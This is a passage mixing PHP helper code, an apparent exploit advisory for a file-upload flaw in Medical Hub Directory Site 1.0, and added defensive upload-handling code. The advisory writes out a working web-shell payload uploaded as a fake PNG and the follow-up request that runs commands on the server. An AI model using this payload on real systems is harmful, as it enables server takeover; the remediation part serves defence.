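// clinic/view_details.php: the same pattern for the category lookup at line 9.
function loadClinicCategories(mysqli $conn, int $clinicId): array {
    $stmt = $conn->prepare(
        'SELECT c.category_id, cc.name AS category
           FROM clinic_category c
           INNER JOIN category_list cc ON c.category_id = cc.id
          WHERE c.clinic_id = ?'
    );
    $stmt->bind_param('i', $clinicId);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// How the page scripts would call these (constructed usage; $_settings as on the page):
// $conversation = loadConversation($conn, $_GET['id'] ?? '', (int) $_settings->userdata('id'));
// if ($conversation === null) { /* the "ID is unknown or you dont have access" branch */ }
// else { markConversationRead($conn, (int) $conversation['id'], (int) $_settings->userdata('id')); }
```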
<pre><code># Title: Medical Hub Directory Site 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 30.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html<br /># Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br />A registered user can bypass the WAF and upload .php.png files in the attachments section by using an intercepting proxy (Burp Suite) to edit the raw request.<br /><br /><br /># Vulnerable PHP code<br />The profile file upload needs more filtering.<br /><br />```php<br />$img_err= "";<br /> if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != ''){<br /> $fname = 'uploads/system-logo.png';<br /> $dir_path =base_app. $fname;<br /> $upload = $_FILES['img']['tmp_name'];<br /> $type = mime_content_type($upload);<br /> $allowed = array('image/png','image/jpeg');<br /> if(!in_array($type,$allowed)){<br /> $img_err.=" But Logo Image failed to upload due to invalid file type.";<br /> }else{<br /> // $new_height = 200; <br /> // $new_width = 200; <br /> <br /> list($width, $height) = getimagesize($upload);<br /> $t_image = imagecreatetruecolor($width, $height);<br /> $black = imagecolorallocate($t_image, 0, 0, 0);<br /> imagecolortransparent($t_image, $black);<br /> imagealphablending( $t_image, false );<br /> imagesavealpha( $t_image, true );<br /> $gdImg = ($type == 'image/png')? 
imagecreatefrompng($upload) : imagecreatefromjpeg($upload);<br /> imagecopyresampled($t_image, $gdImg, 0, 0, 0, 0, $width, $height, $width, $height);<br /> if($gdImg){<br /> if(is_file($dir_path))<br /> unlink($dir_path);<br /> $uploaded_img = imagepng($t_image,$dir_path);<br /> if($uploaded_img){<br /> if(isset($_SESSION['system_info']['logo'])){<br /> $qry = $this->conn->query("UPDATE system_info set meta_value = CONCAT('{$fname}','?v=',unix_timestamp(CURRENT_TIMESTAMP)) where meta_field = 'logo' ");<br /> }else{<br /> $qry = $this->conn->query("INSERT into system_info set meta_value = CONCAT('{$fname}','?v=',unix_timestamp(CURRENT_TIMESTAMP)),meta_field = 'logo' ");<br /> }<br /> }<br /> imagedestroy($gdImg);<br /> imagedestroy($t_image);<br /> }else{<br /> $img_err.=" But Logo Image failed to upload due to unkown reason.";<br /> }<br /> }<br /> }<br />```<br /><br /><br />[+] Payload POST<br /><br /><br />```<br />POST /mhds/admin/?page=manage_account HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738<br />Content-Length: 882<br />Origin: https://0day.gov<br />Referer: https://0day.gov/mhds/<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productName"<br />Hejap Zairy<br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php"<br />Content-Type: image/png<br /><br /><?=`$_GET[515]`?><br /><br />-----------------------------409902128312379197203124536738<br 
/>Content-Disposition: form-data; name="submit"<br />-----------------------------409902128312379197203124536738--<br />```<br /><br /><br /># Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /mhds/uploads/users/0day_hejap.png.php?515=echo+Hejap+Zairy HTTP/1.1<br /><br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41<br />Upgrade-Insecure-Requests: 1<br />```<br /><br /># Response<br />```<br />HTTP/1.1 200 OK<br />Date: Thu, 30 Mar 2022 11:15:56 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 12<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />Hejap Zairy<br />```<br /><br /><br /># Description:<br />A WAF-bypassing file upload vulnerability occurs when a user uploads an executable script file and then uses that script to execute server-side commands. This attack is the most direct and effective kind, sometimes having almost no technical barriers.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/N9rKLB4.png<br />https://i.imgur.com/CrpqRox.png<br />https://i.imgur.com/Un1sM4Q.png<br /></code></pre>
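The request above uploads a file named 0day_hejap.php under an image Content-Type, and the server later executes it from /uploads/users/ because the client-supplied name was kept. The logo code quoted earlier already shows the right instinct (decode and re-encode with GD); the added example below, which is not the project's code, completes that approach for an attachment upload: type is decided from the bytes, the image is re-encoded, and the stored name and extension are generated server-side. The function name storeImageUpload() and the directory path are assumptions.

```php
<?php
// Added example, not the project's code. Stores an uploaded image safely and
// returns the server-generated file name.
function storeImageUpload(array $file, string $uploadDir): string
{
    if (!isset($file['tmp_name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or missing.');
    }
    $tmp = $file['tmp_name'];
    if (!is_uploaded_file($tmp)) {
        throw new RuntimeException('Not an uploaded file.');
    }

    // 1. Decide the type from the bytes, never from $_FILES['type'] or the name.
    $info = @getimagesize($tmp);
    if ($info === false) {
        throw new RuntimeException('File is not a decodable image.');
    }
    $allowed = [IMAGETYPE_PNG => 'png', IMAGETYPE_JPEG => 'jpg'];
    if (!isset($allowed[$info[2]])) {
        throw new RuntimeException('Only PNG and JPEG images are accepted.');
    }
    $ext = $allowed[$info[2]];

    // 2. Cross-check with the server-side MIME sniffer as a second opinion
    //    (the original code used mime_content_type() alone, which is bypassable
    //    by a valid image header followed by script).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($mime !== image_type_to_mime_type($info[2])) {
        throw new RuntimeException("MIME mismatch: $mime");
    }

    // 3. Re-encode. Metadata, comments and trailing bytes do not survive a
    //    decode/encode round trip, so a script merely appended to a valid
    //    image is dropped.
    $src = $ext === 'png' ? imagecreatefrompng($tmp) : imagecreatefromjpeg($tmp);
    if ($src === false) {
        throw new RuntimeException('Image could not be decoded.');
    }

    // 4. Server-generated name with a single, known extension: no "x.php.png",
    //    no "x.png.php", nothing the client chose. This is the decisive control,
    //    since PHP only runs files whose extension the web server maps to it.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;

    $ok = $ext === 'png' ? imagepng($src, $dest) : imagejpeg($src, $dest, 90);
    imagedestroy($src);
    if (!$ok) {
        throw new RuntimeException('Could not write re-encoded image.');
    }
    return $name;
}

// Constructed usage: the form field is "productimage1" as in the advisory's request.
// $saved = storeImageUpload($_FILES['productimage1'], __DIR__ . '/uploads/users');
```

Independently of the PHP-side checks, the uploads directory should be configured so the web server never hands its contents to the PHP interpreter.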